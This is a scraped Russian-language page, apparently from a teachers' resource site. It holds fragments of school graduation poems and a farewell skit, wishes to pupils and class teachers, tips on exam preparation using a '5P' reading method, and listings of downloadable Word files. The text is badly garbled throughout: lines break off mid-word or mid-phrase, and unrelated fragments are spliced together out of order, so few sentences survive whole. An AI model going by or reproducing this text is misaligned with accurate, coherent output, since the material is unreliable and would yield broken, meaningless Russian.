​Microsoft Word Document ​НОВЫЕ ФОРМЫ ВОСПИТАТЕЛЬНОЙ ​Microsoft Word Document ​130.5 KB​

​23.0 KB​Во всеоружии (о подготовке к ​экзаменам​экзамены​

​родителей и детей​Просто жить на ​​
​А над городом ​
​Пожелаем Вас всем ​
​И нет сейчас ​
​А главное, себя не потерять.​
​будет так, как вам хотелось,​
​Ведь налицо пред ​

​Ни пуха в ​Вас от души ​Своих питомцев видеть ​Самим собой!​
​это просто.​
​Благополучья собственного рай!​
​Никому я не ​
​От потерь и ​
​Покой и сон ​

​Время, словно карусель,​О, боже, дай мне сил​
​Припев:​
​В водовороте школьных ​
​растает​
​День над нами ​
​Веру, Любовь и Надежду!»​

​Теперь же ступайте ​Когда-нибудь с добрым ​
​поступят –​Экзамены сдать успешно.​
​месяц!​
​вещали?​

​К классу маршрут ​Разве не вашей ​
​И отвечала тихо:​
​Ты помоги нам ​
​Взмолились классные папы:​

​человечьим:​Пришел он с ​
​–​
​Пришли они с ​
​А я попросила ​
​пришел с поклоном:​Медалистов нет – и не надо!​

​Сделай так, чтобы дети​попросит Рыбку,​Идут они к ​

​синему морю,​этих тяжких​
​Дети у них ​
​моря​
​Мы вам расскажем ​

​Человек образованный все-таки лучше. ​тебя,​И при этом ​

​мы помним, и вы вспоминайте ​себя оставляет в ​мы мнении едины,​

​встает расставания тень.​грустно расстаться хотя ​Классные мамы у ​

​Чтоб его на ​А я ей ​

​отдать.​талант большой​

​Ангел. ​Побольше оптимизма.​
​Черт. ​
​влюбляется.​
​ним.​

​С охотою читает.​На инструментах пусть ​
​Успехов ей в ​
​подходе ( под ширмой появляются ​
​Готовы руки, голова ( из-за ширмы появляются ​

​нее от нас ​я -​

​(из-за ширмы появляются ​

​Бог. ​

​жизни самый главный.​(звонит) Але, справочная? Что такое классный?​Бог ​"Небесная канцелярия".​А только предпоследнего​школьная,​ни длилось бы,​

​были дни в ​Будьте, парни, гордыми орлами!​переступить.​Надо смело выбрать ​

​Мы желаем вновь ​школу и нас ​

​Будьте счастливы всегда!​

​другу быть добрее, научи любить.​

​Добивайтесь, не сдавайтесь никогда, нигде!​тоже, чтоб не подвели!​

​Классные руководители​Как нелегко все ​

​И там, где ждали, появиться.​

​растаял.​Все чувства сразу ​

​открывают.​Нельзя же с ​

​Как всегда, за вас горой!​Вспоминать почаще нас!​

​И хотели б ​С кем ты ​

​блестит:​

​Всех на конкурс ​Как не вспомнить ​И взрослели с ​

​все выше, выше​

​что сказать хотим...».​

​Любви, цветов и красоты,​

​ Успехов Вам и ​

​Улыбкой мир для ​

​старанье и уменье​открыто, смело.​наполняли знаньями:​Поверьте, мы Вас очень ​

​дела!​

​Мы знаем, Вы любили их!​

​Он знаний требует ​

​Учителей не забывать​

​не обманет.​Пускай удача не ​

​Ведь трудно в ​жить,​

​не покидать​от души​

​Одну ты выбрать ​За ней - нелегкие пути,​

​и директору)​вас к мечте, кто отдал вам ​

​путь, мои друзья!​От всей души, со всей любовью,​

​Строгий критик и ​И чтоб азарт, упорство, смелость​

​восторжествует.​

​В душе лелея ​

По теме: методические разработки, презентации и конспекты

​благославляем.​Сегодня мы вас ​4П — Перескажи текст​Метод «5 П»​

​Запиши эту цепочку ​После соединения каждого ​текста. Обдумай и постарайся ​в той последова­тельности, которая нужна для ​абзац.​Ключевые слова — самые важные в ​

​нашими знаниями и ​надо будет вернуться ​получится!​луч­шему его запоминанию.​метод «5П», разработанный американскими психологами. По данным психологов ​большого количества времени. Готовься к ним ​уже известным. Следи за тем, чтобы это были ​

​говорится.​15. При чтении параграфа ​перерывы.​подготовишься к первому ​каждого задания. Убери со стола ​записаны.​обращайся за помощью ​

​(то есть о ​

​с помощью электронных ​слов, находи нужные факты ​уроке: внимательно слушай, отвечай на вопросы.​40.5 KB​

​Отчет о поведении ​125.0 KB​25.0 KB​21.0 KB​Кодекс поведения в ​

​(картинки)​


​наши и​Что означают наши ​
​быть равным".Телевизионный цикл из ​​психофизического развития могут ​​50.0 KB​​Классный час посвященный ​
​​